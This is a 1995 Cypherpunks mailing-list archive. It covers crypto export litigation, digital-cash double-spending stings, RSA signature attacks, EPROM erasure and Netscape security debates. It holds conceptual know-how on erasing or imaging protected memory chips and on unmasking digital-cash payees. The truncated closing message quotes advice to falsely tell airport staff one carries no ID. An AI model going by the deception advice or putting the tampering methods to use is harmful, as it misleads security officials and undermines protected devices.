Message-ID: <4662pt$pcn@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9510190245.AA20897@toad.com>, John Gilmore  <gnu@toad.com> wrote:
>Last reminder!  Come to the Federal Building in SF this Friday at
>10:15AM, go upstairs to Judge Marilyn Hall Patel's courtroom, and Be
>There for the first skirmish in the trial of crypto export controls.
>450 Golden Gate Avenue in downtown SF, two blocks from Van Ness.
>
>We've gotten a lot of press interest.  Both the legal-newspapers in
>SF, the Examiner, and many others will be covering it.  Some of them
>breathlessly asked, "Will the cypherpunks hold a demonstration?", but
>what we will demonstrate is how the legal system can turn against the
>bureaucrats and authoritarians who currently hold crypto hostage.
>
>This will be a low-key meeting, quietly bearing witness, at least
>before we adjourn to a probably rowdy lunch at Max's Opera Cafe at Van
>Ness and Golden Gate Avenues.  If you can't come to the hearing, at
>least come for lunch!
>
>And don't forget, it's a costume party: Dress like a banker.  Even
>you bitbankers.  Even me.  See you there!
>
A handful of interested students from Manuel Blum's Crypto class at
Berkeley will likely be attending (sort of an unofficial field trip).
I've managed to raise awareness and interest in this issue among the
class.

   - Ian "I doubt some of these grad students even _have_ banker outfits..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 19 Oct 95 08:00:57 PDT
To: pdlamb@iquest.com (Patrick Lamb)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <199510191439.JAA05986@vespucci.iquest.com>
Message-ID: <9510191458.AA14604@all.net>
MIME-Version: 1.0
Content-Type: text


...
> (b) flame one Netscape employee for not knowing everything you know?  If
> there are all of 5+ refereed publications in this area, how about giving
> references?  It would take up less space than your recurring venom eruption!
> Or couldn't you understand the papers, given that you couldn't understand
> the news clip...

I tried to take this discussion off line with the Netscape employee, but
he brought it back by CCing the list.  The references are available on
my W3 server (see the URL below) and searchable along with 350+ other
references on information security, most of them annotated.

In terms of taking up space, your replies to the list take up space as
well.  If you want me to list references for you, send me email without
CCing the rest of the list, and I will send you more than you are likely
to want to read.

The people at Netscape STILL have not told those of us on the list what
is meant by "security" in their claims.  Does it include integrity?
Confidentiality?  Availabillity?  Reduced liability?  Something else?
I await an responsive answer.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 10:49:35 PDT
To: cypherpunks@toad.com
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
Message-ID: <acabd56b3c0210041857@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:46 PM 10/19/95, Nathan Loofbourrow wrote:
(quoting someone else...)

> >      Perhaps someone with more semiconductor physics background
> > can correct me, but my understanding is that some kinds of nuclear
> > radiation can be used to erase OTP EPROMS.   I suppose this might damage

Sure, x-rays can erase EPROM cells. (Not the dosages found in airport x-ray
machines, anticipating the usual question someone raises when they hear
this.)

> > the crystal lattice badly enough to render the device useless in
> > some bit positions or reduce data retention time a lot, but I sure
> > wouldn't bet any security on devices out there not being
> > arbitrarily reprogrammable (thus using bits to represent digital
> > coins in a wallet that get reset when they are spent is not a
> > good idea).

The details of whether one can x-ray (or gamma-ray, etc.) erase a one-time
programmable (OTP) device without semi-permanently damaging it depend on a
lot of factors. Generally, an EPROM-based OTP device will erase under
irradiation before it is damaged. (At least this was my experience. Your
erasage may vary.)

>You might want to take a look at the paper I mentioned, then: I
>believe that irradiation of the OTP EPROM to return all bits to "ones"
>is too blunt a tool to do you any good. A virgin EPROM has a value of
>zero in the suggested scheme. And, as mentioned, flipping random sets
>of bits is strongly likely to get you caught.

Whether a floating gate empty of electrons ("erased") is considered to be a
"zero" or a "one" is wholly dependent on conventions in the design....one
manufacturer may treat "erased" bits as zeroes, another as ones. (The sense
of the charge may invert several times on the way through the sense
amplifiers and decoding logic.)

Bottom line: I'd take a bet that I could bulk-erase a Dallas Semi chip
without damaging it permanently, even if lacked a transparent lid. But I
wouldn't take a bet that I can then reprogram it so as to spoof another
such chip.

Continuing on to some other points:

>I seem to remember PROMs actually undergoing physical, rather than
>electrical, state changes (that were presumably nonreversible). Am I
>recalling old technology, or am I just plain mistaken?

There are several kinds of "programmable read-only memories" (PROMs):

* Fusible-link PROMs, in which a silicon, nichrome, or other fuse is
"blown" by passing an appropriate current through the fuse. These are
indeed nonreversible changes (though a failure mechanism is for fuses to
"grow back"). And there are variants involving "anti-fuses."

* _Erasable_ PROMs, in two main categories:

- UV-EPROMs, or just EPROMs, in which a dosage of UV light through a
transparent window (quartz or sapphire) erases the EPROM cells. This works
by the UV photons supply enough energy to the electrons stored in isolated
("floating") polysilicon gates so tha they leave the floating gates and are
conducted away. Programming is done by forcing electrons to be
avalanche-injected onto the floating gates.

- EE-PROMs, or EEPROMs, or "E-squared PROMs," in which UV light is not
needed. A suitable electrical bias can cause a cell to be erased (i.e., to
allow electrons on floating gates to leave).

* And there are all sorts of wrinkles, variants, and other issues:

- Transparent lids vs. no lids. EEPROMs obviously need no transparent lids.
Even EPROMs may be built without transparent lids, if the intended use is
for customers to program them _once_ and only once ("OTP").

- Bit-erase vs. block-erase. Whether individual bits in an EEPROM can be
erased without neighboring bits being erased. A design issue. (Obviously
UV-EPROMs are only used in block-erase situations, where the block is the
entire memory.)

Intel built a "Key-PROM," circa 1983-5, in which the innards were somewhat
encrypted against outside-reading. My electron-beam testing lab was able to
image the internal states of these devices and so bypass the encryption.
(But it was enough for casual use to foil certain types of copying.)

I hope this helps. Semiconductor physics is its own specialty, like crypto.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 11:06:25 PDT
To: cypherpunks@toad.com
Subject: Errors in the Cyphernomicon FAQ
Message-ID: <acabdf373d0210046595@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:29 PM 10/19/95, Scott Brickner wrote:
>Andreas Bogk writes:
...
>>
>>In the Cyphernomicon, section 12.6.6, Tim May writes:
>>
>>             - Chaum went to great lengths to develop system which
....

>>But as far as I got Chaums idea, Alice would not reveal Bobs identity,
>>but rather her own. Am I missing a point here?
>
>You're right.  Tim's wrong.  Bob can't spend the money Alice gave him
>without depositing it in the bank and getting new money issued.  Each
>coin has "This money was issued to Alice" as an invisible imprint which
>only shows up when two coins with the same serial number are together.

Well, it's surely not the only error in my Cyphernomicon FAQ.

I might say I'll correct mistakes pointed out to me, except that there may
never be a second edition of that Cyphernomicon--the work to make changes
and then upload copies is just too staggering, and I've happily put aside
plans to keep it "current" with the flood of new stuff coming over the list
everyday.

As I've said in earlier explanations, I wrote the thing because people were
always clamoring "Where's the FAQ? How come there's no FAQ? I want to see a
FAQ!" After several people volunteered to work on a FAQ, and none appeared,
I stupidly volunteered. Eventually, 8 months later, my Cyphernomicon
appeared.

And, sure enough, there have been calls recently for a "new FAQ."
Complaints that the Cyphernomicon is "too long" and that it "doesn't have
anything on the Netscape hacks." Well, be my guest. But beware the problem
that topics drift in and out of au courancy (probably not a valid word),
that today's big focus on bugs in Netscape is perhaps not what a FAQ on
Cypherpunks issues might want to emphasize.

But, nobody's stopping others from writing FAQs.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 18 Oct 95 18:21:36 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510181636.JAA17879@jobe.shell.portal.com>
Message-ID: <199510190120.LAA29179@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

Hal <hfinney@shell.portal.com> wrote:
 
(replying to Eli Brandt <eli@UX3.SP.CS.CMU.EDU>)

> I think splitting the message would be OK, but then the question is who
> is responsible for reassembling it?  If there were a "reassembly
> server" which took such messages, assembled them, and forwarded them,
> then we would be right back where we started from.  If the end user is
...

Not really. Wouldn't there be a different politic to reassembling
messages as opposed to anonymous remailing?

Such a reassembly server could cooperate with the authorities, nay, even
precede each message with a PGP-signed list of where the various pieces
came from. On second thoughts that last is a bad idea (because
you might want the first line to be eg a reply block), but such a list
could be published on WWW by Message-ID (or Subject, or ...).

The remailers thus implicated have the defence that they could not possibly
have known the contents of the message, because it was split.

Actually, the same end can be achieved by having a non-anonymous remailer,
which simply decrypts and mails - and cooperates with the authorities.
It doesn't even need to strip the headers. However, such a thing would
probably have no other function than this so it might be harder to run.

(A reassembly server would have the stated function of implementing
k-of-n splits, eg for key/document escrow etc. Pieces coming in anonymously
would be merely permitted, not expected.)


BTW: s1018954@aix2.uottawa.ca wrote:

> On Wed, 18 Oct 1995, t byfield wrote:
...
> > header-forging: it's a practical fact of the net, and one that maybe
> > shouldn't be overlooked on (basically vague) 'moral' grounds, any more than
> 
> The courts can't overlook it either. There goes liability. If I posted 
> pirated software from this account, according to what you're saying, I could 
> claim a forgery and show reasonable doubt.

I understand that a post of mine on Cypherpunks had certain piece
of CoS scripture added to it. The original post was signed, and the
person or persons responsible did not attempt to include the
addition within the signed part (merely attached it to the end) so
the signature still checked out.

Even on cypherpunks somebody replied to that addition with the
attribution "Jiri Baum wrote" without noting it wasn't signed by me.

(Called it "drivil", too, but I guess that's between him, his English 
teacher and the CoS.)

"Richard Martin" <rmartin@aw.sgi.com> replied to s.:

...
> *If* we were all wonderful little cypher-junkies and signed
> everything, then we might plausibly be able to deny forged mail: "I
...

Well, I sign everything, don't I? (Somebody please tell me if I don't.)

No I don't have it hard-coded into my mailer. However it's easy enough
to do as it is:
  ":w qqq", switch windows or ^Z, "pgp -sat qqq", go back, "dG:r qqq.asc".

...
> I'm looking forward to the point where my mail reader will sort things
> according to reputations I give correspondents, and perhaps flag mail
...

Yup. Why don't you write one? ("cypherpunks write code")


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIWnqCxV6mvvBgf5AQH5rgQAuQb2Q86dlORTGyByuZA9Uw1P+66gqune
FWWc6uNFYysP6pjX0kl+Z3BVlYLJieRrY5wO/J1pJDOXcJC4NqAShfW8gXpA0F27
kkNc9yE+418ppdF5tyInjOGAHdeQyLQ0Klqthb2lBXo7pjAagEc9wXnlCRT8sj1i
9FXXZ4yDgjs=
=Bnu1
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Thu, 19 Oct 95 08:20:39 PDT
To: cypherpunks@toad.com
Subject: Oppenheimer Quote Regarding Government Secrecy and Public Policy
Message-ID: <9510191524.AA11016@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rather liked this quote regarding the development of the super in the 1950s.

J. Robert Oppenheimer, "Atomic Weapons and American Policy," Foreign
Affairs, Vol. 31, No. 4, July 1953, p. 525.

 [We must have] candor on the part of the officials of the United States
Government to the officials, the representatives, the people of their
country.  We do not operate well when the important facts, the essential
conditions, which limit and determine our choices are unknown.  We do not
operate well when they are known, in secrecy and in fear, only to a few men.
        The political vitality of our country largely derives form two
sources.  One is the interplay, the conflict of opinion and debate, in may
diverse and complex agencies, legislative and executive, which contribute to
the making of policy.  The other is a public opinion which is based on
confidence that it knows the truth.
        Today public opinion cannot exist in this field.  No responsible
person will hazard and opinion in a field where he believes that there is
somebody else who knows the true, and where he believes that he does not
know it.

-------------------------
Regards,                 I hate people when they aren't polite - Talking Heads
Joseph M. Reagle Jr.     http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu           0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 19 Oct 95 09:29:46 PDT
To: Andreas Bogk <andreas@artcom.de>
Subject: Re: digital cash and identity disclosure
In-Reply-To: <m0t5ej6-0002ebC@horten>
Message-ID: <199510191629.MAA28243@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Andreas Bogk writes:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Hi...
>
>In the Cyphernomicon, section 12.6.6, Tim May writes:
>
>             - Chaum went to great lengths to develop system which
>                preserve anonymity for single-spending instances, but
>                which break anonymity and thus reveal identity for double-
>                spending instances. I'm not sure what market forces
>                caused him to think about this as being so important, but
>                it creates many headaches. Besides being clumsy, it
>                require physical ID, it invokes a legal system to try to
>                collect from "double spenders," and it admits the
>                extremely serious breach of privacy by enabling stings.
>                For example, Alice pays Bob a unit of money, then quickly
>                Alice spends that money before Bob can...Bob is then
>                revealed as a "double spender," and his identity revealed
>                to whomver wanted it...Alice, IRS, Gestapo, etc. A very
>                broken idea. Acceptable mainly for small transactions.
>
>But as far as I got Chaums idea, Alice would not reveal Bobs identity,
>but rather her own. Am I missing a point here?

You're right.  Tim's wrong.  Bob can't spend the money Alice gave him
without depositing it in the bank and getting new money issued.  Each
coin has "This money was issued to Alice" as an invisible imprint which
only shows up when two coins with the same serial number are together.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 19 Oct 95 08:32:30 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <199510191427.HAA10783@jobe.shell.portal.com>
Message-ID: <9510191529.AA15811@all.net>
MIME-Version: 1.0
Content-Type: text


> fc@all.net (Dr. Frederick B. Cohen) writes:
> >3 - I would have figured at least one of you would have looked up the
> >chosen plaintext attack and told me why Netscape keys can't be gotten
> >at this way.  I think there's an off change I could win a grand!
> 
> I had missed this in your original posting.  Here it is again:
> 
> > Concept 3 - There is a chosen plaintext attack against the RSA (published
> > in the 1980s in a Crypto conference (IACR?).
> > 
> >         Attack 50 - Use your Hot Java capability to sign selected
> >         message after message till the attacker derives your private key.
> >        I think this takes one or two messages per bit of private key.
> 
> Chosen plaintext attacks against RSA don't work in the context of RSA
> signatures, because the input to the RSA algorithm is a hash of the
> message being signed.  You can't control the hash the way you need to to
> implement a chosen plaintext attack.  (You can't "choose" the hash.)
> 
> For example, one kind of chosen plaintext attack would be to get an RSA
> signature on 2, on 3, on 5, on 7, and so on, on all the primes.  This
> would let you create an RSA signature on any number by factoring the
> number and multiplying the RSA signatures of its prime factors.  But
> there is no way to do this in practice because as RSA-based signatures
> are actually implemented only hashes are signed.  This is done exactly to
> prevent this and similar attacks.

And how secure is the hash? It it possible to create values that will
hash to each prime (or something else that does the job)? Is the hash
something we can figure a way to precompute using massively parallel
processing so that we can then provide a set of codes which will produce
the desired results? (etc.)


-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 19 Oct 95 08:32:40 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: ABA guidelines no longer read-only
Message-ID: <Pine.SUN.3.91.951019112705.19016B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am informed by the webmaster of the page holding the guidelines that 
the Section leadership has authorized him to make the text downloadable 
and that he will make it available in various formats very soon.

This desirable result was, however, in no way helped by what I am also 
informed was juvenile and in at lest one instance threatening email sent 
to the parties involved.   That the mail identified itself as originating 
from members of this list -- and in response to my message announcing the 
site existed -- can only have the result of devaluing any comment I and 
other people on this list may make.

Not a pretty sight. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Wed, 18 Oct 95 18:37:26 PDT
To: Chris Claborne <Chris.Claborne@sandiegoca.attgis.com>
Subject: Re: San Diego Cypherpunks Physical Meeting
In-Reply-To: <199510171835.OAA02450@ncrhub5.attgis.com>
Message-ID: <9510190138.AA43639@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Chris Claborne <Chris.Claborne@sandiegoca.attgis.com> wrote:
     Don't forget to bring your public key  fingerprint.  If you can figure
  out how to get it on the back of a business card, that would be cool.  

This isn't so hard. See below. Unless you have a
somewhat longer name and email address than me,
you can print a page full of them and cut them up.

Basically all I did was edit the output of pgp -kvc 
to split the first line into two, and remove many
of the blanks from the fingerprint. Then
cut-and-paste in the editor to put two copies per
line. Then five copies of the lines. Then print it
at 9.5 point (most people could probably use 10
point, but "Greg Rose <Greg_Rose@sydney.sterling.com>"
is longer than a business card in 10 point
courier). I see that Chris's (presumed) PGP key
wouldn't fit, but vertically speaking you have
plenty of room for two keys, and could wrap the
name and email parts onto two lines.

The parameters to the lpr command are for HP/UX,
in case anyone is wondering. This way I just run
the script, rather than having to remember how to
get it printed.

Hope that helps,
Greg.

#!/bin/lpr -os9.5
pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945





pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945





pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945





pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945





pub  1024/4DBA1091 1994/11/29		      pub  1024/4DBA1091 1994/11/29
Gregory G. Rose <ggr@rss.com.au>	      Gregory G. Rose <ggr@rss.com.au>
6C9287223EEFE995 2B1CB9CCEC89A954	      6C9287223EEFE995 2B1CB9CCEC89A954
	
pub  1024/09D3E64D 1994/11/30		      pub  1024/09D3E64D 1994/11/30
Greg Rose <Greg_Rose@sydney.sterling.com>     Greg Rose <Greg_Rose@sydney.sterling.com>
350A797D5E218D47 E3537566ACFBD945	      350A797D5E218D47 E3537566ACFBD945







-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIWsDaRQkCwJ0+ZNAQE+lwP+LZiwkE67iBmStEWaYB/vLqNk9NXi4mul
RthFMfadNICGpHAT2diSYoGomgtHIN8vADZGhKjzx0NqHlokgCePEZhiZF7frNsy
D5y4n4WsSOK7KT3dsKsa+LGt49QZc7Brgch1CVN5i4Ic9EN8X7labqeKBPf1rKYu
ffBrMl9y1Xk=
=+sqs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 11:26:28 PDT
To: cypherpunks@toad.com
Subject: Re: digital cash and identity disclosure
Message-ID: <acabe4df3f021004b9f5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 PM 10/19/95, Hal wrote:

>There is an attack here, but the text doesn't go into detail about it.
>You have to assume that (as with the current ecash implementation from
>Digicash) people have non-anonymous accounts with the bank.  If Alice
>wants to know Bob's identity she can collude with the bank to find
>out.  As Tim describes, she gives Bob some money, then quickly deposits
>the coins herself.  In effect, she intentionally double-spends (with
>the bank's permission).  When Bob makes his deposit, his coins are
>recognized as matching those which Alice double-spent.  So if Alice
>was, say, an agent involved in a government "sting", and bought bootleg
>software from Bob, his identity can in fact be learned when he deposits
>the money.
>
>Actually with the DigiCash system and in fact all of the ecash systems I
>know about, you don't have to get so fancy; Alice can simply give the
>bank a record of her transaction with Bob (the coins she sent him) and
>these will be recognized when Bob deposits them.
>
>Lucky Green has been discussing ways in which people could exchange coins
>anonymously even with DigiCash's ecash in order to provide some immunity
>from such attacks.

As Hal notes, there are a lot of issues and attacks to consider. I'm sorry
that my brief section on Chaumian digital cash in the Cyphernomicon doesn't
adequately cover the issues (and as the debates here show, confusion still
reigns, and no doubt some of my points are misleading, wrong, or
incomplete).

"Double spending" detection is a REAL MESS. That's my basic conclusion. It
tends to require schemes for going after double spenders, it tends to make
identity-revealing attacks possible (such as the attack I alluded to, and
that Hal more completely describes), and it's INELEGANT.

"Immediate clearing" is much more elegant, and is, I think, truer to the
spirit of "annonymous digital cash" than most of these other schemes are.
(Grep the FAQ for "online" or "online clearing" or "clearing" and you
should find some stuff. Also, several articles--including one recently by
me, about a month ago--go into the differences between the types of
clearing.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Wed, 18 Oct 95 18:39:55 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks in Sydney (Australia)
Message-ID: <9510190141.AA13777@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Any interest in a Sydney Australia Cypherpunks
meeting, say in mid-november? I'll be happy to
provide a venue if there is. Replies by email to
me please.

Greg.

- -- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIWsuaRQkCwJ0+ZNAQHJVQQAiyf154u6OKRoEQQj099RGwdcDJBWCKuO
RCVm32OfvDJp00xtfaTfkl6+CTjxk3hu5LO/Q02FhjoCvnm43UPy6KtPuStnnr0h
QvsmcV6OMvuGDxCXIcuGWqBRaz6VPFlnHgWcpYSIpU/7QsIkDdxOblUcvoEJMaDo
Ab4US4qtJmg=
=0BPe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 19 Oct 95 09:57:42 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <9510191458.AA14604@all.net>
Message-ID: <Pine.SUN.3.90.951019115251.17527B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I belive you have been told *SAVERAL* times you *WONT* get an answer
on this list, and to contact their PR department. Why dont you do us all 
a favor. Contact the PR department if this questions really burns you so 
much. Get an answer. And post it on the list.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Thu, 19 Oct 1995, Dr. Frederick B. Cohen wrote:

> The people at Netscape STILL have not told those of us on the list what
> is meant by "security" in their claims.  Does it include integrity?
> Confidentiality?  Availabillity?  Reduced liability?  Something else?
> I await an responsive answer.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 19 Oct 95 12:10:42 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <199510191905.MAA25411@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Dearest Alice:

A) Please get an alpha account so that I can killfile you.

B) Barring (A), please post an -EXPLOIT-. Back up your words with
working code. Show me how Netscape, properly configured, does what you
describe. Hell, I'll give you a t-shirt for it.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Oct 95 12:05:03 PDT
To: cypherpunks@toad.com
Subject: Tabling Results for Primes Considered Hard
Message-ID: <acabee0a40021004e13f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:29 PM 10/19/95, Dr. Frederick B. Cohen wrote:

>And how secure is the hash? It it possible to create values that will
>hash to each prime (or something else that does the job)? Is the hash
>something we can figure a way to precompute using massively parallel
>processing so that we can then provide a set of codes which will produce
>the desired results? (etc.)

There are a lot of primes. Parallel processors will not help much.

(These are deliberately understated points, natch.)

With even such "small" RSA moduli as 200 digits, made up of primes of
roughly 100 digits each, the computed hashes of these numbers would fill
the universe many times over. (There are estimated to be about 10^75
particles of all types in the entire universe, so each particle would be
"responsible" for storing the results (?) for about 10^20 or more primes.)

There may be many more flaws and points of attack in Netscape and SSl, but
precomputing hashes of the primes is not one of them.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Thu, 19 Oct 95 12:40:07 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <199510191930.MAA28188@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: futplex@pseudonym.com (Futplex)
> 
> DCF writes:
> [re: shwoing picture ID to board commercial flights in the U.S.]
> > I wonder how many have challenged this.  
> 
> During the California-wide Unabomber scare a few months back (before the LAX-
> specific scare), someone on the list said they planned to test it at SJC. I 
> think it was Dana Orfeo. The trip report has never surfaced, though. 
> 
> (Dana ?  Are you there ?)
> 
 
[ Snip ]

I'm here.  And I apologize for failing to write the promised report.
In any case, better late than never...

I flew out of the San Jose "International" Airport (SJC) over the July 4th
weekend to visit a friend of mine.  Many of you may remember this weekend
corresponding with the California-wide Unabomber scare.

I flew on Delta airlines.  My intention was to create as much trouble as
possible with the I.D. bit, though to ultimately capitulate (if necessary)
as I _did_ want to get where I was going.


Private email from Futplex, quoted with permission:

> I suggest acting very innocently at the start, as though you don't suspect
> they might try to card you. Try just having some cash in your wallet --
> put anything that might conceivably identify you in a separate pocket, apart
> from the ticket itself. When they ask you for ID, mildly claim that you
> aren't carrying any. When they insist, show off your anonymous wallet. (You
> might want to claim that a friend dropped you off at the airport, and another
> friend is picking you up at the other end, to explain why you're not carrying
